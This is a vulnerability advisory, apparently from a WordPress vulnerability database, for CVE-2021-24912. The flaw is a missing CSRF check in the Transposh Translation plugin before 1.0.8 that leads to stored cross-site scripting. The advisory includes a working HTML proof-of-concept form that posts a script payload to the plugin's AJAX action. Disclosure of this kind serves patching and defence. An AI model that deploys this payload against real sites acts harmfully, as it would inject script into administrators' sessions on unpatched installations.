WordPress Plugin Vulnerabilities

Transposh WordPress Translation < 1.0.8 - CSRF to Stored XSS

Description

The plugin does not have CSRF check in its tp_translation AJAX action, which could allow attackers to make authorised users add a translation. Given the lack of sanitisation in the tk0 parameter, this could lead to a Stored Cross-Site Scripting issue which will be executed in the context of a logged in admin

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp_translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="<script>alert(/XSS-csrf/)</script>" />
      <input type="hidden" name="tr0" value="csrf" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
transposh-translation-filter-for-wordpress
Fixed in 1.0.8

References

CVE
CVE-2021-24912

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Julien Ahrens
Verified
Yes
WPVDB ID
349483e2-3ab5-4573-bc03-b1ebab40584d

Timeline

Publicly Published
2022-02-22 (about 1 years ago)
Added
2022-07-28 (about 1 years ago)
Last Updated
2023-04-28 (about 7 months ago)

Other

Published
Title
Published
2020-01-06
Title
WP Simple Spreadsheet Fetcher For Google < 0.3.7 - Arbitrary API Key update via CSRF
Published
2023-09-05
Title
WP Custom Post Template <= 1.0 - Settings Update via CSRF
Published
2023-06-02
Title
Page Builder by AZEXO <= 1.27.133 - Cross-Site Request Forgery (CSRF) to Stored XSS
Published
2019-07-11
Title
Pricing Table < 2.3 - Cross-Site Request Forgery
Published
2023-11-09
Title
Woo Custom and Sequential Order Number <= 2.6.0 - Cross-Site Request Forgery